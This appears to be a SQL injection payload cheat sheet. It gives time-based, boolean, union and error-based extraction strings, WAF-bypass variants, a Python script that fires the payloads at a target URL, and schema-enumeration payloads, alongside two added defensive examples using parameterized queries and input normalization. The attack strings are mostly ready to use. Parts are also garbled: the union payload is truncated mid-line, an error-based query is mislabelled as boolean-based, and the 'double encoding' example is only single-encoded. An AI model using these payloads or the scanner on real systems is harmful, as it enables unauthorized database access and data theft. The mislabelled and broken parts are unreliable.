# Some More Advanced Payloads and Explanation.


### <mark style="color:blue;">**1. Time-Based Blind SQL Injection with Complex Payloads**</mark>

Time-based blind SQL injection infers data from how long the database takes to respond rather than from what it returns. The method works even when the application shows no errors and no query output.

**Payload**:

```sql
' AND IF(ORD(MID((SELECT IFNULL(CAST(DATABASE() AS NCHAR),0x20)),1,1))>77,SLEEP(5),0)--
```

**Explanation**: This payload uses a conditional statement to delay the response by five seconds if the first character of the database name is greater than '**M**' (ASCII 77). Repeating it with different thresholds and positions extracts the value one character at a time.

**How it Works**:

* `ORD()` converts the extracted character to its ASCII value.
* `MID()` extracts one character (here the first) from the result of the subquery, which is the database name cast to `NCHAR`, or a space (`0x20`) if it is NULL.
* `IF()` calls `SLEEP()` only when the comparison is true, so the delay itself carries the answer.
* Injected into a vulnerable parameter, the payload makes the application respond late exactly when the condition holds, which lets the tester infer the character's value.

### <mark style="color:blue;">**2. Boolean-Based Blind SQL Injection with Large Payloads**</mark>

Boolean-based blind SQL injection exploits true or false conditions in SQL queries to extract information.

**Payload**:

```sql
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT (SELECT CONCAT(0x7e,0x27, DATABASE(), 0x27,0x7e)) FROM information_schema.tables LIMIT 1,1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
```

**Explanation**: This payload uses a subquery to wrap the database name in marker characters (`~'` and `'~`) and groups the result by a value derived from `RAND(0)`, forcing the database to return a specific result.

**How it Works**:

* `COUNT(*)` counts the number of rows returned.
* `CONCAT()` concatenates the database name with special characters.
* `RAND()` generates a random number.
* `GROUP BY` forces the query to execute the subquery, leading to an error if the condition is false.
* This payload helps in extracting information by observing the application's behavior based on the boolean condition.

### <mark style="color:blue;">3. Union-Based SQL Injection with Multiple Statements</mark>

**Payload**:

```sql
' UNION ALL SELECT NULL, CONCAT_WS(CHAR(58,45,45,58), user(), database(), version()), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
```

### <mark style="color:blue;">**4. Error-Based SQL Injection with Advanced Payloads**</mark>

Error-based SQL Injection relies on the database to generate errors that reveal information about the database structure and content. By crafting payloads that force the database to produce error messages, attackers can extract valuable data.

**Payload**:

```sql
' AND 1=CONVERT(int, (SELECT @@version))--
```

**Explanation**: This payload forces the database to convert a string value into an integer, generating an error that includes the database version. By manipulating the payload, attackers can retrieve different pieces of information from the error messages.

**How it Works**:

* The `CONVERT()` function attempts to change the database version string into an integer.
* This causes an error, as the version string cannot be converted to an integer.
* The error message reveals the database version.

**Example Use Case**:

```sql
' AND 1=CONVERT(int, (SELECT table_name FROM information_schema.tables))--
```

* This payload generates an error revealing table names from the `information_schema.tables`.
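The boolean oracle from section 2 (the page's `' AND 1=1 -- ` / `' AND 1=2 -- ` pair) shown against a string-concatenated query and against the parameterized query that closes all four injection classes above. This is an added example, not code from the original page; it uses an in-memory SQLite table with constructed rows, and the `users` table layout is assumed.

```python
# Added example (not from the original page): the boolean oracle behind the
# page's "' AND 1=1 -- " / "' AND 1=2 -- " payloads, run against a vulnerable
# concatenated query and against the parameterized fix. SQLite in memory,
# constructed sample rows.
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the page's 'users' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users (username) VALUES (?)",
                     [("alice",), ("bob",)])
    return conn

def lookup_vulnerable(conn, username: str):
    """Builds the query by concatenation: user input becomes part of the SQL."""
    sql = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, username: str):
    """Parameterized query: the same input is only ever a string literal."""
    sql = "SELECT id, username FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()

def boolean_oracle(lookup, conn, base: str) -> bool:
    """True when the two page payloads yield different results, i.e. the
    injected condition is being evaluated by the database."""
    true_case = lookup(conn, base + "' AND 1=1 -- ")
    false_case = lookup(conn, base + "' AND 1=2 -- ")
    return true_case != false_case

if __name__ == "__main__":
    db = make_db()
    print("vulnerable oracle:", boolean_oracle(lookup_vulnerable, db, "alice"))  # True
    print("parameterized oracle:", boolean_oracle(lookup_safe, db, "alice"))     # False
```

With the vulnerable function the `1=1` variant still returns alice and the `1=2` variant returns nothing, which is the signal every blind technique on this page depends on; with the parameterized function both inputs are just unknown usernames and the signal disappears.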

### <mark style="color:blue;">WAF Bypass Techniques</mark>

WAFs (Web Application Firewalls) often block common SQL injection patterns. Advanced techniques are required to bypass these defenses.

**Double Encoding**

**Payload**:

```sql
%27%20AND%201=1%20--%20
```

**Explanation**: This payload uses double URL encoding to bypass WAF filters that only decode input once.

**Case Variation**

**Payload**:

```sql
' aND 1=1 --
```

**Explanation**: This payload uses mixed case to evade case-sensitive WAF filters.

**Comment Obfuscation**

**Payload**:

```sql
'/**/AND/**/1=1--
```

**Explanation**: This payload inserts comments between keywords to bypass simplistic pattern matching filters.
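A detection-side counterpart to the three evasions above: a normalizer that peels URL-encoding layers, strips inline comments and case-folds before matching, next to the naive single-pass check each evasion defeats. This is an added example, not from the original page; the regex, the decode-round cap and the double-encoded sample are this example's own constructed choices.

```python
# Added example (not from the original page): normalize request input before
# pattern matching so that encoding layers, mixed case and /**/ comments do not
# hide the page's "' AND 1=1" pattern. Regex and round cap are assumptions.
import re
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # bound repeated decoding so crafted input cannot loop forever

def normalize(value: str) -> str:
    """Decode until stable, drop /* */ comments, collapse whitespace, lower-case."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # '/**/AND/**/1=1' -> ' AND 1=1'
    value = re.sub(r"\s+", " ", value)
    return value.lower()

# A quote followed by a boolean/union keyword, e.g. "' and 1=1".
SQLI_PATTERN = re.compile(r"'\s*(and|or|union)\b")

def naive_check(value: str) -> bool:
    """Single pass, case-sensitive, no decoding: what a simplistic WAF rule does."""
    return "' AND" in value

def normalized_check(value: str) -> bool:
    return SQLI_PATTERN.search(normalize(value)) is not None

if __name__ == "__main__":
    # The three payloads from this page plus a constructed double-encoded variant.
    samples = ["%27%20AND%201=1%20--%20", "' aND 1=1 --", "'/**/AND/**/1=1--",
               "%2527%2520AND%25201=1"]
    for s in samples:
        print(f"{s!r:32} naive={naive_check(s)!s:5} normalized={normalized_check(s)}")
```

Normalization is a detection aid, not a fix: the parameterized query, not the filter, is what removes the vulnerability.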

### <mark style="color:blue;">Automating SQL Injection with Python</mark>

Automating SQL Injection can save time and increase efficiency. Python, with its versatile libraries, is an excellent choice for creating automated tools.

**Sample Python Script for Automating SQL Injection**

**Script**:

```python
import requests

def sqli_test(url, payload):
    # Append the raw payload to the target URL; requests percent-encodes the
    # characters it must (spaces, for example) before sending the request.
    full_url = f"{url}{payload}"
    # A timeout bounds the wait; without one a delayed response hangs the script.
    response = requests.get(full_url, timeout=10)
    return response.text

def main():
    url = 'http://example.com/vulnerable_page.php?id='
    payloads = [
        "' AND 1=1 -- ",
        "' AND 1=2 -- ",
        "' UNION SELECT NULL, CONCAT_WS(CHAR(58,45,45,58), user(), database(), version()), NULL -- "
    ]

    for payload in payloads:
        result = sqli_test(url, payload)
        # Crude check: a database error string in the body suggests the input reached the query.
        if "error" in result or "You have an error in your SQL syntax" in result:
            print(f"Potential SQL Injection vulnerability found with payload: {payload}")
            print(result)

if __name__ == "__main__":
    main()
```

**Explanation**:

* The script defines a function `sqli_test()` to send HTTP GET requests with SQLi payloads.
* The `main()` function iterates over a list of payloads, sending each to the target URL.
* The script checks the response for typical SQL error messages, indicating a potential vulnerability.

### <mark style="color:red;">Appendix: Additional Payloads and Resources</mark>

**Additional Payloads**

1. **Extracting Database Users**:

   ```sql
   ' UNION SELECT NULL, user() --
   ```
2. **Extracting Table Names**:

   ```sql
   ' UNION SELECT NULL, table_name FROM information_schema.tables --
   ```
3. **Extracting Column Names**:

   ```sql
   ' UNION SELECT NULL, column_name FROM information_schema.columns WHERE table_name='users' --
   ```

**Resources**

* [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
* [SQLMap: Automatic SQL Injection and Database Takeover Tool](http://sqlmap.org/)
* [PayloadAllTheThings GitHub Repository](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)

